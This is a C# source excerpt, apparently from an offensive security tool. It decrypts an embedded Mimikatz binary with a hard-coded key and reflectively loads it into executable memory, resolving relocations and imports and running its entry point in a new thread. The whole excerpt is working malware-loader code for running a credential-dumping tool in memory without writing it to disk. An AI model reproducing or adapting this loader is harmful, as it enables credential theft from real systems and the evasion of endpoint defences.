public static void Exec()
{
byte[] latestMimikatz = null;
try
{
//Use Misc Class to encrypt your own files
if (IntPtr.Size == 8 )
{
//x64 Unpack And Execute
latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password"); //Yes, this is a bad idea.
}
else if (IntPtr.Size == 4 )
{
//x86 Unpack And Execute
latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password"); //Yes, this is a bad idea.
}
}
catch (Exception ex)
{
while (ex != null)
{
//Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
//Console.WriteLine("Downloaded Latest");
PELoader pe = new PELoader(latestMimikatz);
IntPtr codebase = IntPtr.Zero;
if (pe.Is32BitHeader)
{
//Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
//Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
else
{
//Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
//Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
//Copy Sections
for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
{
IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
//Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
}
//Perform Base Relocation
//Calculate Delta
IntPtr currentbase = codebase;
long delta;
if (pe.Is32BitHeader)
{
delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
}
else
{
delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
}
//Console.WriteLine("Delta = {0}", delta.ToString("X4"));
//Modify Memory Based On Relocation Table
IntPtr relocationTable;
if (pe.Is32BitHeader)
{
relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
}
else
{
relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
}
NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr nextEntry = relocationTable;
int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
IntPtr offset = relocationTable;
while (true)
{
NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);
for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
{
IntPtr patchAddr;
UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
UInt16 type = (UInt16)(value >> 12);
UInt16 fixup = (UInt16)(value & 0xfff);
switch (type)
{
case 0x0:
break;
case 0x3:
patchAddr = IntPtrAdd(dest, fixup);
//Add Delta To Location.
int originalx86Addr = Marshal.ReadInt32(patchAddr);
Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
break;
case 0xA:
patchAddr = IntPtrAdd(dest, fixup);
//Add Delta To Location.
long originalAddr = Marshal.ReadInt64(patchAddr);
Marshal.WriteInt64(patchAddr, originalAddr + delta);
break;
}
}
offset = IntPtrAdd(relocationTable, sizeofNextBlock);
sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
relocationEntry = relocationNextEntry;
nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);
if (relocationNextEntry.SizeOfBlock == 0) break;
}
//Resolve Imports
IntPtr z;
IntPtr oa1;
int oa2;
if (pe.Is32BitHeader)
{
z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
}
else
{
z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
}
//Get And Display Each DLL To Load
IntPtr threadStart;
IntPtr hThread;
if (pe.Is32BitHeader)
{
int j = 0;
while (true) //HardCoded Number of DLL's Do this Dynamically.
{
IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "") { break; }
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
//Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt32(a2, (int)funcAddy);
a2 = IntPtrAdd(a2, 4);
if (DllFuncName == "") break;
k++;
}
j++;
}
//Transfer Control To OEP
//Console.WriteLine("Executing Mimikatz");
threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
//Console.WriteLine("Thread Complete");
}
else
{
int j = 0;
while (true)
{
IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "") { break; }
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
//Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
////Console.WriteLine("Function {0}", DllFuncName);
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt64(a2, (long)funcAddy);
a2 = IntPtrAdd(a2, 8);
if (DllFuncName == "") break;
k++;
}
j++;
}
//Transfer Control To OEP
//Console.WriteLine("Executing Mimikatz");
threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
//Console.WriteLine("Thread Complete");
}
//Transfer Control To OEP
//Console.WriteLine("Thread Complete");
//Console.ReadLine();
} //End Main
